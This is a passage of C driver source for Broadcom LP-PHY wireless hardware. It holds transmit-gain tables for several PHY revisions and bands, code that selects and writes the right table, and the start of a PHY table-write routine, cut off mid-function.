15, 14, 0, 62 }, { 7, 15, 14, 0, 60 }, { 7, 15, 14, 0, 59 }, { 7, 15, 14, 0, 57 }, { 7, 
15, 13, 0, 72 }, { 7, 15, 13, 0, 70 }, { 7, 15, 13, 0, 68 }, { 7, 15, 13, 0, 66 }, { 7, 15, 13, 0, 64 }, { 7, 15, 13, 0, 62 }, { 7, 15, 13, 0, 60 }, { 7, 15, 13, 0, 59 }, { 7, 15, 13, 0, 57 }, { 7, 15, 12, 0, 71 }, { 7, 15, 12, 0, 69 }, { 7, 15, 12, 0, 67 }, { 7, 15, 12, 0, 65 }, { 7, 15, 12, 0, 63 }, { 7, 15, 12, 0, 62 }, { 7, 15, 12, 0, 60 }, { 7, 15, 12, 0, 58 }, { 7, 15, 12, 0, 57 }, { 7, 15, 11, 0, 70 }, { 7, 15, 11, 0, 68 }, { 7, 15, 11, 0, 66 }, { 7, 15, 11, 0, 65 }, { 7, 15, 11, 0, 63 }, { 7, 15, 11, 0, 61 }, { 7, 15, 11, 0, 59 }, { 7, 15, 11, 0, 58 }, { 7, 15, 10, 0, 71 }, { 7, 15, 10, 0, 69 }, { 7, 15, 10, 0, 67 }, { 7, 15, 10, 0, 65 }, { 7, 15, 10, 0, 63 }, { 7, 15, 10, 0, 61 }, { 7, 15, 10, 0, 60 }, { 7, 15, 10, 0, 58 }, { 7, 15, 10, 0, 56 }, { 7, 15, 9, 0, 70 }, { 7, 15, 9, 0, 68 }, { 7, 15, 9, 0, 66 }, { 7, 15, 9, 0, 64 }, { 7, 15, 9, 0, 62 }, { 7, 15, 9, 0, 60 }, { 7, 15, 9, 0, 59 }, { 7, 14, 9, 0, 72 }, { 7, 14, 9, 0, 70 }, { 7, 14, 9, 0, 68 }, { 7, 14, 9, 0, 66 }, { 7, 14, 9, 0, 64 }, { 7, 14, 9, 0, 62 }, { 7, 14, 9, 0, 60 }, { 7, 14, 9, 0, 59 }, { 7, 13, 9, 0, 72 }, { 7, 13, 9, 0, 70 }, { 7, 13, 9, 0, 68 }, { 7, 13, 9, 0, 66 }, { 7, 13, 9, 0, 64 }, { 7, 13, 9, 0, 63 }, { 7, 13, 9, 0, 61 }, { 7, 13, 9, 0, 59 }, { 7, 13, 9, 0, 57 }, { 7, 13, 8, 0, 72 }, { 7, 13, 8, 0, 70 }, { 7, 13, 8, 0, 68 }, { 7, 13, 8, 0, 66 }, { 7, 13, 8, 0, 64 }, { 7, 13, 8, 0, 62 }, { 7, 13, 8, 0, 60 }, { 7, 13, 8, 0, 59 }, { 7, 12, 8, 0, 72 }, { 7, 12, 8, 0, 70 }, { 7, 12, 8, 0, 68 }, { 7, 12, 8, 0, 66 }, { 7, 12, 8, 0, 64 }, { 7, 12, 8, 0, 62 }, { 7, 12, 8, 0, 61 }, { 7, 12, 8, 0, 59 }, { 7, 12, 7, 0, 73 }, { 7, 12, 7, 0, 71 }, { 7, 12, 7, 0, 69 }, { 7, 12, 7, 0, 67 }, { 7, 12, 7, 0, 65 }, { 7, 12, 7, 0, 63 }, { 7, 12, 7, 0, 61 }, { 7, 12, 7, 0, 59 }, { 7, 11, 7, 0, 72 }, { 7, 11, 7, 0, 70 }, { 7, 11, 7, 0, 68 }, { 7, 11, 7, 0, 66 }, { 7, 11, 7, 0, 65 }, { 7, 11, 7, 0, 63 }, { 7, 11, 7, 0, 61 }, { 7, 11, 7, 0, 59 }, { 7, 11, 6, 0, 73 }, { 7, 11, 6, 0, 71 } }; static struct bwn_txgain_entry txgain_2ghz_r0[] = { { 4, 15, 9, 0, 64 }, { 4, 15, 9, 0, 62 }, { 4, 15, 9, 0, 60 }, { 4, 15, 9, 0, 59 }, { 4, 14, 9, 0, 72 }, { 4, 14, 9, 0, 70 }, { 4, 14, 9, 0, 68 }, { 4, 14, 9, 0, 66 }, { 4, 14, 9, 0, 64 }, { 4, 14, 9, 0, 62 }, { 4, 14, 9, 0, 60 }, { 4, 14, 9, 0, 59 }, { 4, 13, 9, 0, 72 }, { 4, 13, 9, 0, 70 }, { 4, 13, 9, 0, 68 }, { 4, 13, 9, 0, 66 }, { 4, 13, 9, 0, 64 }, { 4, 13, 9, 0, 63 }, { 4, 13, 9, 0, 61 }, { 4, 13, 9, 0, 59 }, { 4, 13, 9, 0, 57 }, { 4, 13, 8, 0, 72 }, { 4, 13, 8, 0, 70 }, { 4, 13, 8, 0, 68 }, { 4, 13, 8, 0, 66 }, { 4, 13, 8, 0, 64 }, { 4, 13, 8, 0, 62 }, { 4, 13, 8, 0, 60 }, { 4, 13, 8, 0, 59 }, { 4, 12, 8, 0, 72 }, { 4, 12, 8, 0, 70 }, { 4, 12, 8, 0, 68 }, { 4, 12, 8, 0, 66 }, { 4, 12, 8, 0, 64 }, { 4, 12, 8, 0, 62 }, { 4, 12, 8, 0, 61 }, { 4, 12, 8, 0, 59 }, { 4, 12, 7, 0, 73 }, { 4, 12, 7, 0, 71 }, { 4, 12, 7, 0, 69 }, { 4, 12, 7, 0, 67 }, { 4, 12, 7, 0, 65 }, { 4, 12, 7, 0, 63 }, { 4, 12, 7, 0, 61 }, { 4, 12, 7, 0, 59 }, { 4, 11, 7, 0, 72 }, { 4, 11, 7, 0, 70 }, { 4, 11, 7, 0, 68 }, { 4, 11, 7, 0, 66 }, { 4, 11, 7, 0, 65 }, { 4, 11, 7, 0, 63 }, { 4, 11, 7, 0, 61 }, { 4, 11, 7, 0, 59 }, { 4, 11, 6, 0, 73 }, { 4, 11, 6, 0, 71 }, { 4, 11, 6, 0, 69 }, { 4, 11, 6, 0, 67 }, { 4, 11, 6, 0, 65 }, { 4, 11, 6, 0, 63 }, { 4, 11, 6, 0, 61 }, { 4, 11, 6, 0, 60 }, { 4, 10, 6, 0, 72 }, { 4, 10, 6, 0, 70 }, { 4, 10, 6, 0, 68 }, { 4, 10, 6, 0, 66 }, { 4, 10, 6, 0, 64 }, { 4, 10, 6, 0, 62 }, { 4, 10, 6, 0, 60 }, { 4, 10, 6, 0, 59 }, { 4, 10, 5, 0, 72 }, { 4, 10, 5, 0, 70 }, { 4, 10, 5, 0, 68 }, { 4, 
10, 5, 0, 66 }, { 4, 10, 5, 0, 64 }, { 4, 10, 5, 0, 62 }, { 4, 10, 5, 0, 60 }, { 4, 10, 5, 0, 59 }, { 4, 9, 5, 0, 70 }, { 4, 9, 5, 0, 68 }, { 4, 9, 5, 0, 66 }, { 4, 9, 5, 0, 64 }, { 4, 9, 5, 0, 63 }, { 4, 9, 5, 0, 61 }, { 4, 9, 5, 0, 59 }, { 4, 9, 4, 0, 71 }, { 4, 9, 4, 0, 69 }, { 4, 9, 4, 0, 67 }, { 4, 9, 4, 0, 65 }, { 4, 9, 4, 0, 63 }, { 4, 9, 4, 0, 62 }, { 4, 9, 4, 0, 60 }, { 4, 9, 4, 0, 58 }, { 4, 8, 4, 0, 70 }, { 4, 8, 4, 0, 68 }, { 4, 8, 4, 0, 66 }, { 4, 8, 4, 0, 65 }, { 4, 8, 4, 0, 63 }, { 4, 8, 4, 0, 61 }, { 4, 8, 4, 0, 59 }, { 4, 7, 4, 0, 68 }, { 4, 7, 4, 0, 66 }, { 4, 7, 4, 0, 64 }, { 4, 7, 4, 0, 62 }, { 4, 7, 4, 0, 61 }, { 4, 7, 4, 0, 59 }, { 4, 7, 3, 0, 67 }, { 4, 7, 3, 0, 65 }, { 4, 7, 3, 0, 63 }, { 4, 7, 3, 0, 62 }, { 4, 7, 3, 0, 60 }, { 4, 6, 3, 0, 65 }, { 4, 6, 3, 0, 63 }, { 4, 6, 3, 0, 61 }, { 4, 6, 3, 0, 60 }, { 4, 6, 3, 0, 58 }, { 4, 5, 3, 0, 68 }, { 4, 5, 3, 0, 66 }, { 4, 5, 3, 0, 64 }, { 4, 5, 3, 0, 62 }, { 4, 5, 3, 0, 60 }, { 4, 5, 3, 0, 59 }, { 4, 5, 3, 0, 57 }, { 4, 4, 2, 0, 83 }, { 4, 4, 2, 0, 81 }, { 4, 4, 2, 0, 78 }, { 4, 4, 2, 0, 76 }, { 4, 4, 2, 0, 74 }, { 4, 4, 2, 0, 72 } }; static struct bwn_txgain_entry txgain_5ghz_r0[] = { { 7, 15, 15, 0, 99 }, { 7, 15, 15, 0, 96 }, { 7, 15, 15, 0, 93 }, { 7, 15, 15, 0, 90 }, { 7, 15, 15, 0, 88 }, { 7, 15, 15, 0, 85 }, { 7, 15, 15, 0, 83 }, { 7, 15, 15, 0, 81 }, { 7, 15, 15, 0, 78 }, { 7, 15, 15, 0, 76 }, { 7, 15, 15, 0, 74 }, { 7, 15, 15, 0, 72 }, { 7, 15, 15, 0, 70 }, { 7, 15, 15, 0, 68 }, { 7, 15, 15, 0, 66 }, { 7, 15, 15, 0, 64 }, { 7, 15, 15, 0, 62 }, { 7, 15, 15, 0, 60 }, { 7, 15, 15, 0, 59 }, { 7, 15, 15, 0, 57 }, { 7, 15, 15, 0, 55 }, { 7, 15, 14, 0, 72 }, { 7, 15, 14, 0, 70 }, { 7, 15, 14, 0, 68 }, { 7, 15, 14, 0, 66 }, { 7, 15, 14, 0, 64 }, { 7, 15, 14, 0, 62 }, { 7, 15, 14, 0, 60 }, { 7, 15, 14, 0, 58 }, { 7, 15, 14, 0, 56 }, { 7, 15, 14, 0, 55 }, { 7, 15, 13, 0, 71 }, { 7, 15, 13, 0, 69 }, { 7, 15, 13, 0, 67 }, { 7, 15, 13, 0, 65 }, { 7, 15, 13, 0, 63 }, { 7, 15, 13, 0, 62 }, { 7, 15, 13, 0, 60 }, { 7, 15, 13, 0, 58 }, { 7, 15, 13, 0, 56 }, { 7, 15, 12, 0, 72 }, { 7, 15, 12, 0, 70 }, { 7, 15, 12, 0, 68 }, { 7, 15, 12, 0, 66 }, { 7, 15, 12, 0, 64 }, { 7, 15, 12, 0, 62 }, { 7, 15, 12, 0, 60 }, { 7, 15, 12, 0, 59 }, { 7, 15, 12, 0, 57 }, { 7, 15, 11, 0, 73 }, { 7, 15, 11, 0, 71 }, { 7, 15, 11, 0, 69 }, { 7, 15, 11, 0, 67 }, { 7, 15, 11, 0, 65 }, { 7, 15, 11, 0, 63 }, { 7, 15, 11, 0, 61 }, { 7, 15, 11, 0, 60 }, { 7, 15, 11, 0, 58 }, { 7, 15, 10, 0, 71 }, { 7, 15, 10, 0, 69 }, { 7, 15, 10, 0, 67 }, { 7, 15, 10, 0, 65 }, { 7, 15, 10, 0, 63 }, { 7, 15, 10, 0, 61 }, { 7, 15, 10, 0, 60 }, { 7, 15, 10, 0, 58 }, { 7, 15, 9, 0, 70 }, { 7, 15, 9, 0, 68 }, { 7, 15, 9, 0, 66 }, { 7, 15, 9, 0, 64 }, { 7, 15, 9, 0, 62 }, { 7, 15, 9, 0, 61 }, { 7, 15, 9, 0, 59 }, { 7, 15, 9, 0, 57 }, { 7, 15, 9, 0, 56 }, { 7, 14, 9, 0, 68 }, { 7, 14, 9, 0, 66 }, { 7, 14, 9, 0, 65 }, { 7, 14, 9, 0, 63 }, { 7, 14, 9, 0, 61 }, { 7, 14, 9, 0, 59 }, { 7, 14, 9, 0, 58 }, { 7, 13, 9, 0, 70 }, { 7, 13, 9, 0, 68 }, { 7, 13, 9, 0, 66 }, { 7, 13, 9, 0, 64 }, { 7, 13, 9, 0, 63 }, { 7, 13, 9, 0, 61 }, { 7, 13, 9, 0, 59 }, { 7, 13, 9, 0, 57 }, { 7, 13, 8, 0, 70 }, { 7, 13, 8, 0, 68 }, { 7, 13, 8, 0, 66 }, { 7, 13, 8, 0, 64 }, { 7, 13, 8, 0, 62 }, { 7, 13, 8, 0, 60 }, { 7, 13, 8, 0, 59 }, { 7, 13, 8, 0, 57 }, { 7, 12, 8, 0, 70 }, { 7, 12, 8, 0, 68 }, { 7, 12, 8, 0, 66 }, { 7, 12, 8, 0, 64 }, { 7, 12, 8, 0, 62 }, { 7, 12, 8, 0, 61 }, { 7, 12, 8, 0, 59 }, { 7, 12, 8, 0, 57 }, { 7, 12, 7, 0, 70 }, { 7, 12, 7, 0, 68 }, { 7, 12, 7, 0, 66 }, { 7, 12, 7, 0, 64 }, { 7, 
12, 7, 0, 62 }, { 7, 12, 7, 0, 61 }, { 7, 12, 7, 0, 59 }, { 7, 12, 7, 0, 57 }, { 7, 11, 7, 0, 70 }, { 7, 11, 7, 0, 68 }, { 7, 11, 7, 0, 66 }, { 7, 11, 7, 0, 64 }, { 7, 11, 7, 0, 62 }, { 7, 11, 7, 0, 61 }, { 7, 11, 7, 0, 59 }, { 7, 11, 7, 0, 57 }, { 7, 11, 6, 0, 69 }, { 7, 11, 6, 0, 67 }, { 7, 11, 6, 0, 65 }, { 7, 11, 6, 0, 63 }, { 7, 11, 6, 0, 62 }, { 7, 11, 6, 0, 60 } }; static struct bwn_txgain_entry txgain_r1[] = { { 7, 15, 14, 0, 152 }, { 7, 15, 14, 0, 147 }, { 7, 15, 14, 0, 143 }, { 7, 15, 14, 0, 139 }, { 7, 15, 14, 0, 135 }, { 7, 15, 14, 0, 131 }, { 7, 15, 14, 0, 128 }, { 7, 15, 14, 0, 124 }, { 7, 15, 14, 0, 121 }, { 7, 15, 14, 0, 117 }, { 7, 15, 14, 0, 114 }, { 7, 15, 14, 0, 111 }, { 7, 15, 14, 0, 107 }, { 7, 15, 14, 0, 104 }, { 7, 15, 14, 0, 101 }, { 7, 15, 14, 0, 99 }, { 7, 15, 14, 0, 96 }, { 7, 15, 14, 0, 93 }, { 7, 15, 14, 0, 90 }, { 7, 15, 14, 0, 88 }, { 7, 15, 14, 0, 85 }, { 7, 15, 14, 0, 83 }, { 7, 15, 14, 0, 81 }, { 7, 15, 14, 0, 78 }, { 7, 15, 14, 0, 76 }, { 7, 15, 14, 0, 74 }, { 7, 15, 14, 0, 72 }, { 7, 15, 14, 0, 70 }, { 7, 15, 14, 0, 68 }, { 7, 15, 14, 0, 66 }, { 7, 15, 14, 0, 64 }, { 7, 15, 14, 0, 62 }, { 7, 15, 14, 0, 60 }, { 7, 15, 14, 0, 59 }, { 7, 15, 14, 0, 57 }, { 7, 15, 13, 0, 72 }, { 7, 15, 13, 0, 70 }, { 7, 15, 14, 0, 68 }, { 7, 15, 14, 0, 66 }, { 7, 15, 14, 0, 64 }, { 7, 15, 14, 0, 62 }, { 7, 15, 14, 0, 60 }, { 7, 15, 14, 0, 59 }, { 7, 15, 14, 0, 57 }, { 7, 15, 13, 0, 72 }, { 7, 15, 13, 0, 70 }, { 7, 15, 13, 0, 68 }, { 7, 15, 13, 0, 66 }, { 7, 15, 13, 0, 64 }, { 7, 15, 13, 0, 62 }, { 7, 15, 13, 0, 60 }, { 7, 15, 13, 0, 59 }, { 7, 15, 13, 0, 57 }, { 7, 15, 12, 0, 71 }, { 7, 15, 12, 0, 69 }, { 7, 15, 12, 0, 67 }, { 7, 15, 12, 0, 65 }, { 7, 15, 12, 0, 63 }, { 7, 15, 12, 0, 62 }, { 7, 15, 12, 0, 60 }, { 7, 15, 12, 0, 58 }, { 7, 15, 12, 0, 57 }, { 7, 15, 11, 0, 70 }, { 7, 15, 11, 0, 68 }, { 7, 15, 11, 0, 66 }, { 7, 15, 11, 0, 65 }, { 7, 15, 11, 0, 63 }, { 7, 15, 11, 0, 61 }, { 7, 15, 11, 0, 59 }, { 7, 15, 11, 0, 58 }, { 7, 15, 10, 0, 71 }, { 7, 15, 10, 0, 69 }, { 7, 15, 10, 0, 67 }, { 7, 15, 10, 0, 65 }, { 7, 15, 10, 0, 63 }, { 7, 15, 10, 0, 61 }, { 7, 15, 10, 0, 60 }, { 7, 15, 10, 0, 58 }, { 7, 15, 10, 0, 56 }, { 7, 15, 9, 0, 70 }, { 7, 15, 9, 0, 68 }, { 7, 15, 9, 0, 66 }, { 7, 15, 9, 0, 64 }, { 7, 15, 9, 0, 62 }, { 7, 15, 9, 0, 60 }, { 7, 15, 9, 0, 59 }, { 7, 14, 9, 0, 72 }, { 7, 14, 9, 0, 70 }, { 7, 14, 9, 0, 68 }, { 7, 14, 9, 0, 66 }, { 7, 14, 9, 0, 64 }, { 7, 14, 9, 0, 62 }, { 7, 14, 9, 0, 60 }, { 7, 14, 9, 0, 59 }, { 7, 13, 9, 0, 72 }, { 7, 13, 9, 0, 70 }, { 7, 13, 9, 0, 68 }, { 7, 13, 9, 0, 66 }, { 7, 13, 9, 0, 64 }, { 7, 13, 9, 0, 63 }, { 7, 13, 9, 0, 61 }, { 7, 13, 9, 0, 59 }, { 7, 13, 9, 0, 57 }, { 7, 13, 8, 0, 72 }, { 7, 13, 8, 0, 70 }, { 7, 13, 8, 0, 68 }, { 7, 13, 8, 0, 66 }, { 7, 13, 8, 0, 64 }, { 7, 13, 8, 0, 62 }, { 7, 13, 8, 0, 60 }, { 7, 13, 8, 0, 59 }, { 7, 12, 8, 0, 72 }, { 7, 12, 8, 0, 70 }, { 7, 12, 8, 0, 68 }, { 7, 12, 8, 0, 66 }, { 7, 12, 8, 0, 64 }, { 7, 12, 8, 0, 62 }, { 7, 12, 8, 0, 61 }, { 7, 12, 8, 0, 59 }, { 7, 12, 7, 0, 73 }, { 7, 12, 7, 0, 71 }, { 7, 12, 7, 0, 69 }, { 7, 12, 7, 0, 67 }, { 7, 12, 7, 0, 65 }, { 7, 12, 7, 0, 63 }, { 7, 12, 7, 0, 61 }, { 7, 12, 7, 0, 59 }, { 7, 11, 7, 0, 72 }, { 7, 11, 7, 0, 70 }, { 7, 11, 7, 0, 68 }, { 7, 11, 7, 0, 66 }, { 7, 11, 7, 0, 65 }, { 7, 11, 7, 0, 63 }, { 7, 11, 7, 0, 61 }, { 7, 11, 7, 0, 59 }, { 7, 11, 6, 0, 73 }, { 7, 11, 6, 0, 71 } }; static struct bwn_txgain_entry txgain_2ghz_r1[] = { { 4, 15, 15, 0, 90 }, { 4, 15, 15, 0, 88 }, { 4, 15, 15, 0, 85 }, { 4, 15, 15, 0, 83 }, { 4, 15, 15, 0, 81 
}, { 4, 15, 15, 0, 78 }, { 4, 15, 15, 0, 76 }, { 4, 15, 15, 0, 74 }, { 4, 15, 15, 0, 72 }, { 4, 15, 15, 0, 70 }, { 4, 15, 15, 0, 68 }, { 4, 15, 15, 0, 66 }, { 4, 15, 15, 0, 64 }, { 4, 15, 15, 0, 62 }, { 4, 15, 15, 0, 60 }, { 4, 15, 15, 0, 59 }, { 4, 15, 14, 0, 72 }, { 4, 15, 14, 0, 70 }, { 4, 15, 14, 0, 68 }, { 4, 15, 14, 0, 66 }, { 4, 15, 14, 0, 64 }, { 4, 15, 14, 0, 62 }, { 4, 15, 14, 0, 60 }, { 4, 15, 14, 0, 59 }, { 4, 15, 13, 0, 72 }, { 4, 15, 13, 0, 70 }, { 4, 15, 13, 0, 68 }, { 4, 15, 13, 0, 66 }, { 4, 15, 13, 0, 64 }, { 4, 15, 13, 0, 62 }, { 4, 15, 13, 0, 60 }, { 4, 15, 13, 0, 59 }, { 4, 15, 12, 0, 72 }, { 4, 15, 12, 0, 70 }, { 4, 15, 12, 0, 68 }, { 4, 15, 12, 0, 66 }, { 4, 15, 12, 0, 64 }, { 4, 15, 12, 0, 62 }, { 4, 15, 12, 0, 60 }, { 4, 15, 12, 0, 59 }, { 4, 15, 11, 0, 72 }, { 4, 15, 11, 0, 70 }, { 4, 15, 11, 0, 68 }, { 4, 15, 11, 0, 66 }, { 4, 15, 11, 0, 64 }, { 4, 15, 11, 0, 62 }, { 4, 15, 11, 0, 60 }, { 4, 15, 11, 0, 59 }, { 4, 15, 10, 0, 72 }, { 4, 15, 10, 0, 70 }, { 4, 15, 10, 0, 68 }, { 4, 15, 10, 0, 66 }, { 4, 15, 10, 0, 64 }, { 4, 15, 10, 0, 62 }, { 4, 15, 10, 0, 60 }, { 4, 15, 10, 0, 59 }, { 4, 15, 9, 0, 72 }, { 4, 15, 9, 0, 70 }, { 4, 15, 9, 0, 68 }, { 4, 15, 9, 0, 66 }, { 4, 15, 9, 0, 64 }, { 4, 15, 9, 0, 62 }, { 4, 15, 9, 0, 60 }, { 4, 15, 9, 0, 59 }, { 4, 14, 9, 0, 72 }, { 4, 14, 9, 0, 70 }, { 4, 14, 9, 0, 68 }, { 4, 14, 9, 0, 66 }, { 4, 14, 9, 0, 64 }, { 4, 14, 9, 0, 62 }, { 4, 14, 9, 0, 60 }, { 4, 14, 9, 0, 59 }, { 4, 13, 9, 0, 72 }, { 4, 13, 9, 0, 70 }, { 4, 13, 9, 0, 68 }, { 4, 13, 9, 0, 66 }, { 4, 13, 9, 0, 64 }, { 4, 13, 9, 0, 63 }, { 4, 13, 9, 0, 61 }, { 4, 13, 9, 0, 59 }, { 4, 13, 9, 0, 57 }, { 4, 13, 8, 0, 72 }, { 4, 13, 8, 0, 70 }, { 4, 13, 8, 0, 68 }, { 4, 13, 8, 0, 66 }, { 4, 13, 8, 0, 64 }, { 4, 13, 8, 0, 62 }, { 4, 13, 8, 0, 60 }, { 4, 13, 8, 0, 59 }, { 4, 12, 8, 0, 72 }, { 4, 12, 8, 0, 70 }, { 4, 12, 8, 0, 68 }, { 4, 12, 8, 0, 66 }, { 4, 12, 8, 0, 64 }, { 4, 12, 8, 0, 62 }, { 4, 12, 8, 0, 61 }, { 4, 12, 8, 0, 59 }, { 4, 12, 7, 0, 73 }, { 4, 12, 7, 0, 71 }, { 4, 12, 7, 0, 69 }, { 4, 12, 7, 0, 67 }, { 4, 12, 7, 0, 65 }, { 4, 12, 7, 0, 63 }, { 4, 12, 7, 0, 61 }, { 4, 12, 7, 0, 59 }, { 4, 11, 7, 0, 72 }, { 4, 11, 7, 0, 70 }, { 4, 11, 7, 0, 68 }, { 4, 11, 7, 0, 66 }, { 4, 11, 7, 0, 65 }, { 4, 11, 7, 0, 63 }, { 4, 11, 7, 0, 61 }, { 4, 11, 7, 0, 59 }, { 4, 11, 6, 0, 73 }, { 4, 11, 6, 0, 71 }, { 4, 11, 6, 0, 69 }, { 4, 11, 6, 0, 67 }, { 4, 11, 6, 0, 65 }, { 4, 11, 6, 0, 63 }, { 4, 11, 6, 0, 61 }, { 4, 11, 6, 0, 60 }, { 4, 10, 6, 0, 72 }, { 4, 10, 6, 0, 70 }, { 4, 10, 6, 0, 68 }, { 4, 10, 6, 0, 66 }, { 4, 10, 6, 0, 64 }, { 4, 10, 6, 0, 62 }, { 4, 10, 6, 0, 60 } }; static struct bwn_txgain_entry txgain_5ghz_r1[] = { { 7, 15, 15, 0, 99 }, { 7, 15, 15, 0, 96 }, { 7, 15, 15, 0, 93 }, { 7, 15, 15, 0, 90 }, { 7, 15, 15, 0, 88 }, { 7, 15, 15, 0, 85 }, { 7, 15, 15, 0, 83 }, { 7, 15, 15, 0, 81 }, { 7, 15, 15, 0, 78 }, { 7, 15, 15, 0, 76 }, { 7, 15, 15, 0, 74 }, { 7, 15, 15, 0, 72 }, { 7, 15, 15, 0, 70 }, { 7, 15, 15, 0, 68 }, { 7, 15, 15, 0, 66 }, { 7, 15, 15, 0, 64 }, { 7, 15, 15, 0, 62 }, { 7, 15, 15, 0, 60 }, { 7, 15, 15, 0, 59 }, { 7, 15, 15, 0, 57 }, { 7, 15, 15, 0, 55 }, { 7, 15, 14, 0, 72 }, { 7, 15, 14, 0, 70 }, { 7, 15, 14, 0, 68 }, { 7, 15, 14, 0, 66 }, { 7, 15, 14, 0, 64 }, { 7, 15, 14, 0, 62 }, { 7, 15, 14, 0, 60 }, { 7, 15, 14, 0, 58 }, { 7, 15, 14, 0, 56 }, { 7, 15, 14, 0, 55 }, { 7, 15, 13, 0, 71 }, { 7, 15, 13, 0, 69 }, { 7, 15, 13, 0, 67 }, { 7, 15, 13, 0, 65 }, { 7, 15, 13, 0, 63 }, { 7, 15, 13, 0, 62 }, { 7, 15, 13, 0, 60 }, { 7, 15, 13, 0, 58 }, { 7, 
15, 13, 0, 56 }, { 7, 15, 12, 0, 72 }, { 7, 15, 12, 0, 70 }, { 7, 15, 12, 0, 68 }, { 7, 15, 12, 0, 66 }, { 7, 15, 12, 0, 64 }, { 7, 15, 12, 0, 62 }, { 7, 15, 12, 0, 60 }, { 7, 15, 12, 0, 59 }, { 7, 15, 12, 0, 57 }, { 7, 15, 11, 0, 73 }, { 7, 15, 11, 0, 71 }, { 7, 15, 11, 0, 69 }, { 7, 15, 11, 0, 67 }, { 7, 15, 11, 0, 65 }, { 7, 15, 11, 0, 63 }, { 7, 15, 11, 0, 61 }, { 7, 15, 11, 0, 60 }, { 7, 15, 11, 0, 58 }, { 7, 15, 10, 0, 71 }, { 7, 15, 10, 0, 69 }, { 7, 15, 10, 0, 67 }, { 7, 15, 10, 0, 65 }, { 7, 15, 10, 0, 63 }, { 7, 15, 10, 0, 61 }, { 7, 15, 10, 0, 60 }, { 7, 15, 10, 0, 58 }, { 7, 15, 9, 0, 70 }, { 7, 15, 9, 0, 68 }, { 7, 15, 9, 0, 66 }, { 7, 15, 9, 0, 64 }, { 7, 15, 9, 0, 62 }, { 7, 15, 9, 0, 61 }, { 7, 15, 9, 0, 59 }, { 7, 15, 9, 0, 57 }, { 7, 15, 9, 0, 56 }, { 7, 14, 9, 0, 68 }, { 7, 14, 9, 0, 66 }, { 7, 14, 9, 0, 65 }, { 7, 14, 9, 0, 63 }, { 7, 14, 9, 0, 61 }, { 7, 14, 9, 0, 59 }, { 7, 14, 9, 0, 58 }, { 7, 13, 9, 0, 70 }, { 7, 13, 9, 0, 68 }, { 7, 13, 9, 0, 66 }, { 7, 13, 9, 0, 64 }, { 7, 13, 9, 0, 63 }, { 7, 13, 9, 0, 61 }, { 7, 13, 9, 0, 59 }, { 7, 13, 9, 0, 57 }, { 7, 13, 8, 0, 70 }, { 7, 13, 8, 0, 68 }, { 7, 13, 8, 0, 66 }, { 7, 13, 8, 0, 64 }, { 7, 13, 8, 0, 62 }, { 7, 13, 8, 0, 60 }, { 7, 13, 8, 0, 59 }, { 7, 13, 8, 0, 57 }, { 7, 12, 8, 0, 70 }, { 7, 12, 8, 0, 68 }, { 7, 12, 8, 0, 66 }, { 7, 12, 8, 0, 64 }, { 7, 12, 8, 0, 62 }, { 7, 12, 8, 0, 61 }, { 7, 12, 8, 0, 59 }, { 7, 12, 8, 0, 57 }, { 7, 12, 7, 0, 70 }, { 7, 12, 7, 0, 68 }, { 7, 12, 7, 0, 66 }, { 7, 12, 7, 0, 64 }, { 7, 12, 7, 0, 62 }, { 7, 12, 7, 0, 61 }, { 7, 12, 7, 0, 59 }, { 7, 12, 7, 0, 57 }, { 7, 11, 7, 0, 70 }, { 7, 11, 7, 0, 68 }, { 7, 11, 7, 0, 66 }, { 7, 11, 7, 0, 64 }, { 7, 11, 7, 0, 62 }, { 7, 11, 7, 0, 61 }, { 7, 11, 7, 0, 59 }, { 7, 11, 7, 0, 57 }, { 7, 11, 6, 0, 69 }, { 7, 11, 6, 0, 67 }, { 7, 11, 6, 0, 65 }, { 7, 11, 6, 0, 63 }, { 7, 11, 6, 0, 62 }, { 7, 11, 6, 0, 60 } }; if (mac->mac_phy.rev != 0 && mac->mac_phy.rev != 1) { if (siba_sprom_get_bf_hi(sc->sc_dev) & BWN_BFH_NOPA) bwn_phy_lp_gaintbl_write_multi(mac, 0, 128, txgain_r2); else if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) bwn_phy_lp_gaintbl_write_multi(mac, 0, 128, txgain_2ghz_r2); else bwn_phy_lp_gaintbl_write_multi(mac, 0, 128, txgain_5ghz_r2); return; } if (mac->mac_phy.rev == 0) { if ((siba_sprom_get_bf_hi(sc->sc_dev) & BWN_BFH_NOPA) || (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_HGPA)) bwn_phy_lp_gaintbl_write_multi(mac, 0, 128, txgain_r0); else if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) bwn_phy_lp_gaintbl_write_multi(mac, 0, 128, txgain_2ghz_r0); else bwn_phy_lp_gaintbl_write_multi(mac, 0, 128, txgain_5ghz_r0); return; } if ((siba_sprom_get_bf_hi(sc->sc_dev) & BWN_BFH_NOPA) || (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_HGPA)) bwn_phy_lp_gaintbl_write_multi(mac, 0, 128, txgain_r1); else if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) bwn_phy_lp_gaintbl_write_multi(mac, 0, 128, txgain_2ghz_r1); else bwn_phy_lp_gaintbl_write_multi(mac, 0, 128, txgain_5ghz_r1); } static void bwn_tab_write(struct bwn_mac *mac, uint32_t typeoffset, uint32_t value) { uint32_t offset, type; type = BWN_TAB_GETTYPE(typeoffset); offset = BWN_TAB_GETOFFSET(typeoffset); KASSERT(offset <= 0xffff, ("%s:%d: fail", __func__, __LINE__)); switch (type) { case BWN_TAB_8BIT: KASSERT(!(value & ~0xff), ("%s:%d: fail", __func__, __LINE__)); BWN_PHY_WRITE(mac, BWN_PHY_TABLE_ADDR, offset); BWN_PHY_WRITE(mac, BWN_PHY_TABLEDATALO, value); break; case BWN_TAB_16BIT: KASSERT(!(value & ~0xffff), ("%s:%d: fail", __func__, __LINE__)); BWN_PHY_WRITE(mac, BWN_PHY_TABLE_ADDR, offset); 
